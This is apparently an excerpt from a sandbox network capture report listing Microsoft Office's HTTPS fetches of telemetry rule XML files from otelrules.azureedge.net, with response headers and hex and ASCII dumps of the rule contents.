                                                                            x-azure-ref: 20241028T083716Z-16849878b78wv88bk51myq5vxc000000051g0000000081yy
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:16 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            111192.168.2.44988513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:16 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:16 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:16 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 405
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                            ETag: "0x8DC582B942B6AFF"
                                                                            x-ms-request-id: 612e6849-a01e-0084-0e9c-279ccd000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083716Z-r197bdfb6b4d9xksru4x6qbqr000000004q0000000007nxe
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:16 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            112192.168.2.44988613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:16 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:16 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:16 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 468
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                            ETag: "0x8DC582BBA642BF4"
                                                                            x-ms-request-id: af2b1dc9-001e-0066-0d6c-27561e000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083716Z-16849878b78hh85qc40uyr8sc800000004zg00000000ca2v
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:16 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            113192.168.2.44988713.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:16 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:16 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:16 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 174
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                            ETag: "0x8DC582B91D80E15"
                                                                            x-ms-request-id: 2034bdf9-701e-003e-3056-2679b3000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083716Z-16849878b785dznd7xpawq9gcn000000068g0000000014rd
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:16 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            114192.168.2.44988313.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:16 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:16 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:16 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 419
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                            x-ms-request-id: f9fbd553-601e-003e-5c2e-273248000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083716Z-16849878b786lft2mu9uftf3y4000000063g0000000024mb
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:16 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            115192.168.2.44988813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:17 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:17 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:17 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1952
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                            ETag: "0x8DC582B956B0F3D"
                                                                            x-ms-request-id: ba33cc4f-e01e-0052-2e6f-28d9df000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083717Z-15b8d89586ff5l62aha9080wv000000006500000000000hc
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:17 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            116192.168.2.44989013.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:17 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:17 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:17 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 501
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                            ETag: "0x8DC582BACFDAACD"
                                                                            x-ms-request-id: 97ce691d-801e-0047-0a01-277265000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083717Z-16849878b78qf2gleqhwczd21s00000004yg000000007pba
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:17 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            117192.168.2.44989113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:17 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:17 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:17 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 2592
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                            ETag: "0x8DC582BB5B890DB"
                                                                            x-ms-request-id: c21b0bdf-c01e-008e-186f-287381000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083717Z-15b8d89586fhl2qtatrz3vfkf00000000arg000000005cqc
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:17 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            118192.168.2.44988913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:17 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:17 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:17 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 958
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                            x-ms-request-id: 080ba15e-001e-0082-732b-275880000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083717Z-16849878b787bfsh7zgp804my400000003g000000000b7vt
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:17 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            119192.168.2.44989213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:17 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:17 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:17 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 3342
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                            ETag: "0x8DC582B927E47E9"
                                                                            x-ms-request-id: 41937e91-c01e-008e-5d57-277381000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083717Z-16849878b78fkwcjkpn19c5dsn00000003wg000000001f23
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:17 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            120192.168.2.44989313.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:18 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:18 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:18 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 2284
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                            x-ms-request-id: fb8efb24-701e-0050-0ba3-266767000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083718Z-16849878b787wpl5wqkt5731b400000005g000000000a7gb
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:18 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            121192.168.2.44989513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:18 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:18 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:18 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1356
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
